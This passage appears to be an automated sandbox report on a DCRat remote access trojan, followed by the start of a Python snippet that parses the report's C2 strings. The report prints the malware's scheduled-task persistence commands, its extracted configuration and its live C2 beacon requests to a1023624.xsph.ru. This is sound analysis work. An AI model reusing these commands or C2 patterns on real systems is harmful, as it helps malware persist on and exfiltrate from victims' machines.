Windows Analysis Report
5P9EdUgv5r.exe

Overview

General Information

Sample name: 5P9EdUgv5r.exe (renamed because the original name is a hash value)
Original sample name: 1F70E167B93D471AF9DAF333145DB4CD.exe
Analysis ID: 1502154
MD5: 1f70e167b93d471af9daf333145db4cd
SHA1: b7c1afc111a98055b28c94f62599ff33f41ced24
SHA256: 9fbc9f10ad8bc902a7a847d76b9792ac9f995555e856824f96fd04b7290b5aed
Tags: DCRat, exe

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 5P9EdUgv5r.exe (PID: 1376 cmdline: "C:\Users\user\Desktop\5P9EdUgv5r.exe" MD5: 1F70E167B93D471AF9DAF333145DB4CD)
    • wscript.exe (PID: 4588 cmdline: "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5312 cmdline: C:\Windows\system32\cmd.exe /c ""C:\serversessionmonitor\ovpXJB1x2XJwVqS.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • blockfont.exe (PID: 7076 cmdline: "C:\serversessionmonitor\blockfont.exe" MD5: 960DC58A366579A52C966ACC596733B6)
          • schtasks.exe (PID: 6888 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7180 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7208 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7336 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 9 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7364 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7384 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7404 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7420 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7456 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7484 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7500 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7532 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7572 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7600 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7628 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7652 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SearchApp.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7668 cmdline: schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7684 cmdline: schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7720 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7740 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7760 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows mail\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7788 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7808 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7824 cmdline: schtasks.exe /create /tn "qwhJcOiWbbUoQMvwnJNrq" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\microsoft office\Office16\qwhJcOiWbbUoQMvwnJNr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • qwhJcOiWbbUoQMvwnJNr.exe (PID: 7900 cmdline: "C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe" MD5: 960DC58A366579A52C966ACC596733B6)
  • qwhJcOiWbbUoQMvwnJNr.exe (PID: 7508 cmdline: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe MD5: 960DC58A366579A52C966ACC596733B6)
  • qwhJcOiWbbUoQMvwnJNr.exe (PID: 7552 cmdline: "C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe" MD5: 960DC58A366579A52C966ACC596733B6)
  • cleanup
{"SCRT": "{\"0\":\">\",\"L\":\"~\",\"y\":\"^\",\"o\":\"&\",\"h\":\"*\",\"c\":\"`\",\"A\":\"|\",\"i\":\")\",\"n\":\",\",\"9\":\"_\",\"1\":\"-\",\"I\":\";\",\"J\":\"!\",\"j\":\"%\",\"d\":\".\",\"e\":\"@\",\"C\":\"$\",\"M\":\"#\",\"W\":\" \",\"z\":\"<\",\"N\":\"(\"}", "PCRT": "{\"5\":\"$\",\"Z\":\"&\",\"D\":\"|\",\"a\":\";\",\"U\":\" \",\"E\":\">\",\"R\":\"-\",\"F\":\",\",\"t\":\"~\",\"Q\":\"@\",\"i\":\"%\",\"T\":\"#\",\"Y\":\"^\",\"d\":\"<\",\"4\":\"_\",\"h\":\")\",\"l\":\"!\",\"k\":\"`\",\"J\":\".\",\"X\":\"(\",\"B\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-7082klfQ9GyGfgjPd35M", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false}
Source | Rule | Description | Author | Strings
00000004.00000002.1784999674.0000000003657000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000016.00000002.1870704533.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000014.00000002.1870320993.0000000002E11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000016.00000002.1870704533.000000000302C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

            System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\serversessionmonitor\blockfont.exe, ProcessId: 7076, TargetFilename: C:\Program Files (x86)\windows portable devices\winlogon.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\5P9EdUgv5r.exe", ParentImage: C:\Users\user\Desktop\5P9EdUgv5r.exe, ParentProcessId: 1376, ParentProcessName: 5P9EdUgv5r.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe" , ProcessId: 4588, ProcessName: wscript.exe

            Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\serversessionmonitor\blockfont.exe" , ParentImage: C:\serversessionmonitor\blockfont.exe, ParentProcessId: 7076, ParentProcessName: blockfont.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f, ProcessId: 6888, ProcessName: schtasks.exe

Timestamp: 2024-08-31T09:22:11.861438+0200
SID: 2034194
Severity: 1
Source Port: 49734
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


            AV Detection

Source: 5P9EdUgv5r.exe | Avira: detected
Source: http://a1023624.xsph.ru | Avira URL Cloud: Label: malware
Source: http://a1023624.xsph.ru/ | Avira URL Cloud: Label: malware
Source: http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs | Avira URL Cloud: Label: malware
Source: http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec8 | Avira URL Cloud: Label: malware
Source: C:\serversessionmonitor\blockfont.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\SearchApp.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: 00000004.00000002.1790371382.00000000132BF000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat (the extracted configuration is the JSON block shown above, below the process tree)
Source: a1023624.xsph.ru | Virustotal: Detection: 5%
Source: http://a1023624.xsph.ru | Virustotal: Detection: 5%
Source: http://a1023624.xsph.ru/ | Virustotal: Detection: 5%
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Virustotal: Detection: 68%
Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe | Virustotal: Detection: 68%
Source: C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exe | Virustotal: Detection: 68%
Source: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe | Virustotal: Detection: 68%
Source: C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | Virustotal: Detection: 68%
Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | Virustotal: Detection: 68%
Source: C:\Recovery\SearchApp.exe | ReversingLabs: Detection: 87%
Source: C:\Recovery\SearchApp.exe | Virustotal: Detection: 68%
Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | ReversingLabs: Detection: 87%
Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | Virustotal: Detection: 68%
Source: C:\serversessionmonitor\blockfont.exe | ReversingLabs: Detection: 87%
Source: C:\serversessionmonitor\blockfont.exe | Virustotal: Detection: 68%
Source: 5P9EdUgv5r.exe | ReversingLabs: Detection: 71%
Source: 5P9EdUgv5r.exe | Virustotal: Detection: 61%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\serversessionmonitor\blockfont.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Joe Sandbox ML: detected
Source: C:\Recovery\SearchApp.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe | Joe Sandbox ML: detected
Source: 5P9EdUgv5r.exe | Joe Sandbox ML: detected
Source: 5P9EdUgv5r.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\serversessionmonitor\blockfont.exe | Directory created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe
Source: C:\serversessionmonitor\blockfont.exe | Directory created: C:\Program Files\Windows Portable Devices\8057c8f30c1a8e
Source: 5P9EdUgv5r.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: 5P9EdUgv5r.exe
Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D6A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\5P9EdUgv5r.exe | Code function: 0_2_00D7B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW

            Networking

Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49734 -> 141.8.194.149:80
Source: Joe Sandbox View | IP Address: 141.8.194.149
Source: Joe Sandbox View | ASN Name: SPRINTHOSTRU
Source: global traffic | HTTP traffic detected: GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: a1023624.xsph.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: a1023624.xsph.ru
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: a1023624.xsph.ru | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs HTTP/1.1 | Accept: */* | Content-Type: text/css | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 | Host: a1023624.xsph.ru
Source: global traffic | DNS traffic detected: DNS query: a1023624.xsph.ru
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Sat, 31 Aug 2024 07:22:11 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: keep-alive | Vary: Accept-Encoding | Data Raw: (hex dump of the HTML error page body omitted)
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Sat, 31 Aug 2024 07:22:12 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: keep-alive | Vary: Accept-Encoding | Data Raw: (hex dump of the HTML error page body omitted)
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.0000000003292000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a1023624.xsph.ru
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.0000000003263000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a1023624.xsph.ru/
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec8
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000014.00000002.1867548337.0000000001110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.mic
            Source: blockfont.exe, 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cp.sprinthost.ru
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cp.sprinthost.ru/auth/login
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://index.from.sh/pages/game.html
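The "String found in binary or memory" rows above mix the actual beacon endpoint with .NET namespace URIs and truncated strings. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses rows in exactly the fused text layout shown, groups the URLs by host, drops namespace hosts, and singles out the script endpoint that carries query parameters as the C2 gate candidate. The namespace allowlist and the gate heuristic are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit

# Rows copied from the report above (one memory-dump identifier kept per row).
# The text export fuses the dump column onto the description, so the pattern
# keys on the description text instead of a column separator.
REPORT_ROWS = [
    "Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023624.xsph.ru",
    "Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.0000000003263000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1023624.xsph.ru/",
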